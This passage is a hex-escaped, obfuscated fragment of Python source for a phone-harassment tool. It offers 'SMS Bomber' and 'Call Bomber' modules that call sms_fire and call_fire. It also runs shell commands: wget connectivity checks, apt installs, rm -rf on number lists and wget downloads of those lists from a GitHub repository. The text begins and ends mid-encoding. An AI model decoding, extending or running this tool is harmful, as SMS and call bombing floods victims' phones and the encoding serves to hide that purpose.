x79\x73\x74\x65\x6d\x28\x27\x77\x67\x65\x74\x20\x2d\x71\x20\x2d\x2d\x73\x70\x69\x64\x65\x72\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x27\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x6d\x20\x3d\x3d\x20\x30\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6c\x65\x65\x70\x28\x30\x2e\x33\x29\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x23\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x54\x75\x72\x6e\x20\x6f\x6e\x20\x79\x6f\x75\x72\x20\x69\x6e\x74\x65\x72\x6e\x65\x74\x20\x63\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x5c\x6e\x5c\x6e\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x20\x59\x45\x4c\x4c\x4f\x57\x20\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x0a\x64\x65\x66\x20\x69\x6e\x73\x74\x61\x6c\x6c\x5f\x74\x6f\x6f\x6c\x73\x28\x29\x3a\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x32\x7d\x5b\x7b\x30\x7d\x3e\x7b\x32\x7d\x5d\x7b\x30\x7d\x49\x6e\x73\x74\x61\x6c\x6c\x69\x6e\x67\x20\x52\x65\x71\x75\x69\x72\x65\x6d\x65\x6e\x74\x73\x2e\x2e\x2e\x2e\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x61\x70\x74\x20\x69\x6e\x73\x74\x61\x6c\x6c\x20\x70\x79\x74\x68\x6f\x6e\x20\x63\x75\x72\x6c\x20\x2d\x79\x22\x29\x23\x66\x69\x67\x6c\x65\x74\x20\x74\x6f\x69\x6c\x65\x74\x20\x62\x6f\x78\x65\x73\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x61\x70\x74\x20\x69\x6e\x73\x74\x61\x6c\x6c\x20\x70\x79\x74\x68\x6f\x6e\x33\x2d\x70\x69\x70\x22\x29\x0a\x20\x20\x20\x20\x66\x20\x3d\x20\x6f\x70\x65\x6e\x28\x22\x6c\x6f\x76\x65\x22\x2c\x20\x22\x77\x22\x29\x0a\x20\x20\x20\x20\x66\x2e\x77\x72\x69\x74\x65\x28\x22\x5c\x74\x5c\x74\x75\x20\x6c\x6f\x6f\x6b\x20\x73\x6f\x20\x62\x65\x61\x75\x74\x69\x66\x75\x6c\x20\x3a\x29\x5c\x6e\x5c\x6e\x74\x68\x69\x73\x20\x69\x73\x20\x63\x72\x65\x61\x74\x20\x62\x79\x20\x34\x30\x34\x2d\x67\x68\x6f\x73\x74\x22\x29\x0a\x20\x20\x20\x20\x66\x2e\x63\x6c\x6f\x73\x65\x28\x29\x0a\x20\x20\x20\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x7b\x33\x7d\x50\x72\x65\x73\x73\x20\x45\x6e\x74\x65\x72\x20\x54\x6f\x20\x43\x6f\x6e\x74\x69\x6e\x75\x65\x2e\x2e\x2e\x2e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x0a\x64\x65\x66\x20\x63\x68\x65\x63\x6b\x5f\x74\x6f\x6f\x6c\x28\x29\x3a\x0a\x20\x20\x20\x20\x69\x66\x20\x70\x61\x74\x68\x2e\x69\x73\x66\x69\x6c\x65\x28\x27\x6c\x6f\x76\x65\x27\x29\x20\x3d\x3d\x20\x46\x61\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x73\x74\x61\x6c\x6c\x5f\x74\x6f\x6f\x6c\x73\x28\x29\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x34\x7d\x41\x6c\x6c\x20\x52\x65\x71\x75\x69\x72\x65\x6d\x65\x6e\x74\x73\x20\x46\x6f\x75\x6e\x64\x2e\x2e\x2e\x2e\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x0a\x23\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x4d\x41\x49\x4e\x20\x4d\x45\x4e\x55\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x0a\x64\x65\x66\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x3a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x6d\x6f\x64\x75\x6c\x65\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5c\x6e\x7b\x30\x7d\x5b\x7b\x32\x7d\x20\x53\x45\x4c\x45\x43\x54\x20\x41\x4e\x59\x20\x4d\x4f\x44\x55\x4c\x45\x20\x21\x21\x7b\x30\x7d\x5d\x20\x5c\x6e\x7b\x35\x7d\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x34\x7d\x7b\x30\x7d\x5b\x7b\x32\x7d\x31\x7b\x30\x7d\x5d\x7b\x32\x7d\x20\x53\x4d\x53\x20\x42\x6f\x6d\x62\x65\x72\x20\x7b\x34\x7d\x20\x5c\x6e\x7b\x30\x7d\x5b\x7b\x32\x7d\x32\x7b\x30\x7d\x5d\x7b\x32\x7d\x20\x43\x61\x6c\x6c\x20\x42\x6f\x6d\x62\x65\x72\x7b\x34\x7d\x20\x5c\x6e\x7b\x30\x7d\x5b\x7b\x32\x7d\x33\x7b\x30\x7d\x5d\x7b\x32\x7d\x20\x48\x69\x73\x74\x6f\x72\x79\x20\x5c\x6e\x7b\x30\x7d\x5b\x7b\x32\x7d\x34\x7b\x30\x7d\x5d\x7b\x32\x7d\x20\x45\x78\x69\x74\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x6d\x6f\x64\x75\x6c\x65\x20\x3d\x20\x69\x6e\x70\x75\x74\x28\x22\x7b\x35\x7d\x2d\x2d\x2d\x2d\x3e\x7b\x32\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x6d\x6f\x64\x75\x6c\x65\x20\x3d\x3d\x20\x27\x31\x27\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x67\x65\x74\x5f\x69\x6e\x66\x6f\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x6f\x5f\x73\x6d\x73\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x20\x3d\x20\x5b\x33\x2c\x34\x2c\x35\x2c\x36\x2c\x37\x2c\x38\x2c\x39\x2c\x31\x30\x2c\x31\x31\x2c\x31\x32\x2c\x31\x33\x2c\x31\x34\x2c\x31\x35\x2c\x31\x36\x5d\x23\x31\x30\x30\x2c\x31\x30\x31\x2c\x31\x30\x32\x2c\x31\x30\x33\x2c\x31\x30\x34\x2c\x31\x30\x36\x20\x20\x23\x33\x2c\x34\x2c\x35\x2c\x36\x2c\x37\x2c\x38\x2c\x39\x2c\x31\x30\x2c\x31\x31\x2c\x31\x32\x2c\x31\x33\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6d\x73\x5f\x66\x69\x72\x65\x28\x70\x6e\x2c\x20\x6e\x6d\x2c\x20\x64\x6c\x2c\x20\x63\x68\x2c\x20\x73\x74\x72\x28\x63\x63\x29\x29\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6d\x6f\x64\x75\x6c\x65\x20\x3d\x3d\x20\x27\x32\x27\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x67\x65\x74\x5f\x69\x6e\x66\x6f\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x6f\x5f\x63\x61\x6c\x6c\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x20\x3d\x20\x5b\x31\x30\x30\x2c\x20\x31\x30\x31\x2c\x20\x31\x30\x32\x2c\x20\x31\x30\x33\x2c\x20\x31\x30\x34\x2c\x20\x31\x30\x36\x5d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x61\x6c\x6c\x5f\x66\x69\x72\x65\x28\x70\x6e\x2c\x20\x6e\x6d\x2c\x20\x64\x6c\x2c\x20\x63\x68\x2c\x20\x73\x74\x72\x28\x63\x63\x29\x29\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6d\x6f\x64\x75\x6c\x65\x20\x3d\x3d\x20\x27\x33\x27\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5c\x6e\x7b\x30\x7d\x5b\x7b\x32\x7d\x20\x53\x45\x4c\x45\x43\x54\x20\x41\x4e\x59\x20\x4d\x4f\x44\x55\x4c\x45\x20\x21\x21\x7b\x30\x7d\x5d\x20\x5c\x6e\x7b\x35\x7d\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x34\x7d\x7b\x30\x7d\x5b\x7b\x32\x7d\x31\x7b\x30\x7d\x5d\x7b\x32\x7d\x20\x53\x4d\x53\x20\x48\x69\x73\x74\x6f\x72\x79\x20\x5c\x6e\x7b\x34\x7d\x7b\x30\x7d\x5b\x7b\x32\x7d\x32\x7b\x30\x7d\x5d\x7b\x32\x7d\x20\x43\x61\x6c\x6c\x20\x48\x69\x73\x74\x6f\x72\x79\x5c\x6e\x7b\x30\x7d\x5b\x7b\x35\x7d\x33\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x54\x6f\x20\x44\x65\x6c\x65\x74\x65\x20\x48\x69\x73\x74\x6f\x72\x79\x5c\x6e\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x61\x71\x20\x3d\x20\x69\x6e\x70\x75\x74\x28\x22\x7b\x35\x7d\x2d\x2d\x2d\x2d\x3e\x7b\x32\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x61\x71\x20\x3d\x3d\x20\x22\x31\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x61\x74\x20\x64\x61\x74\x61\x2f\x73\x6d\x73\x5f\x6e\x75\x6d\x62\x65\x72\x5f\x6c\x69\x73\x74\x2e\x74\x78\x74\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x7b\x33\x7d\x50\x72\x65\x73\x73\x20\x45\x6e\x74\x65\x72\x20\x54\x6f\x20\x52\x65\x74\x75\x72\x6e\x20\x54\x6f\x20\x4d\x61\x69\x6e\x20\x4d\x65\x6e\x75\x2e\x2e\x2e\x2e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x61\x71\x20\x3d\x3d\x20\x22\x32\x22\x20\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x61\x74\x20\x64\x61\x74\x61\x2f\x63\x61\x6c\x6c\x5f\x6e\x75\x6d\x62\x65\x72\x5f\x6c\x69\x73\x74\x2e\x74\x78\x74\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x7b\x33\x7d\x50\x72\x65\x73\x73\x20\x45\x6e\x74\x65\x72\x20\x54\x6f\x20\x52\x65\x74\x75\x72\x6e\x20\x54\x6f\x20\x4d\x61\x69\x6e\x20\x4d\x65\x6e\x75\x2e\x2e\x2e\x2e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x61\x71\x20\x3d\x3d\x20\x22\x33\x22\x20\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5c\x6e\x7b\x30\x7d\x5b\x7b\x32\x7d\x20\x53\x45\x4c\x45\x43\x54\x20\x41\x4e\x59\x20\x4d\x4f\x44\x55\x4c\x45\x20\x21\x21\x7b\x30\x7d\x5d\x20\x5c\x6e\x7b\x35\x7d\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x34\x7d\x7b\x30\x7d\x5b\x7b\x32\x7d\x31\x7b\x30\x7d\x5d\x7b\x32\x7d\x44\x65\x6c\x65\x74\x65\x20\x53\x4d\x53\x20\x48\x69\x73\x74\x6f\x72\x79\x20\x5c\x6e\x7b\x34\x7d\x7b\x30\x7d\x5b\x7b\x32\x7d\x32\x7b\x30\x7d\x5d\x7b\x32\x7d\x44\x65\x6c\x65\x74\x65\x20\x43\x61\x6c\x6c\x20\x48\x69\x73\x74\x6f\x72\x79\x5c\x6e\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x61\x6d\x20\x3d\x20\x69\x6e\x70\x75\x74\x28\x22\x7b\x35\x7d\x2d\x2d\x2d\x2d\x3e\x7b\x32\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x61\x6d\x20\x3d\x3d\x20\x22\x31\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x72\x6d\x20\x2d\x72\x66\x20\x64\x61\x74\x61\x2f\x73\x6d\x73\x5f\x6e\x75\x6d\x62\x65\x72\x5f\x6c\x69\x73\x74\x2e\x74\x78\x74\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x64\x20\x64\x61\x74\x61\x20\x26\x26\x20\x77\x67\x65\x74\x20\x2d\x71\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x72\x61\x77\x2e\x67\x69\x74\x68\x75\x62\x75\x73\x65\x72\x63\x6f\x6e\x74\x65\x6e\x74\x2e\x63\x6f\x6d\x2f\x34\x30\x34\x2d\x67\x68\x6f\x73\x74\x2f\x44\x65\x76\x69\x6c\x2d\x73\x2d\x43\x61\x6c\x6c\x2f\x6d\x61\x73\x74\x65\x72\x2f\x64\x61\x74\x61\x2f\x73\x6d\x73\x5f\x6e\x75\x6d\x62\x65\x72\x5f\x6c\x69\x73\x74\x2e\x74\x78\x74\x20\x26\x26\x20\x63\x64\x20\x2e\x2e\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x7b\x33\x7d\x50\x72\x65\x73\x73\x20\x45\x6e\x74\x65\x72\x20\x54\x6f\x20\x52\x65\x74\x75\x72\x6e\x20\x54\x6f\x20\x4d\x61\x69\x6e\x20\x4d\x65\x6e\x75\x2e\x2e\x2e\x2e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x61\x6d\x20\x3d\x3d\x20\x22\x32\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x72\x6d\x20\x2d\x72\x66\x20\x64\x61\x74\x61\x2f\x63\x61\x6c\x6c\x5f\x6e\x75\x6d\x62\x65\x72\x5f\x6c\x69\x73\x74\x2e\x74\x78\x74\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x64\x20\x64\x61\x74\x61\x20\x26\x26\x20\x77\x67\x65\x74\x20\x2d\x71\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x72\x61\x77\x2e\x67\x69\x74\x68\x75\x62\x75\x73\x65\x72\x63\x6f\x6e\x74\x65\x6e\x74\x2e\x63\x6f\x6d\x2f\x34\x30\x34\x2d\x67\x68\x6f\x73\x74\x2f\x44\x65\x76\x69\x6c\x2d\x73\x2d\x43\x61\x6c\x6c\x2f\x6d\x61\x73\x74\x65\x72\x2f\x64\x61\x74\x61\x2f\x63\x61\x6c\x6c\x5f\x6e\x75\x6d\x62\x65\x72\x5f\x6c\x69\x73\x74\x2e\x74\x78\x74\x20\x26\x26\x20\x63\x64\x20\x2e\x2e\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x7b\x33\x7d\x50\x72\x65\x73\x73\x20\x45\x6e\x74\x65\x72\x20\x54\x6f\x20\x52\x65\x74\x75\x72\x6e\x20\x54\x6f\x20\x4d\x61\x69\x6e\x20\x4d\x65\x6e\x75\x2e\x2e\x2e\x2e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x53\x6f\x6d\x65\x74\x68\x69\x6e\x67\x20\x57\x65\x6e\x74\x20\x57\x72\x6f\x6e\x67\x2e\x2e\x2e\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x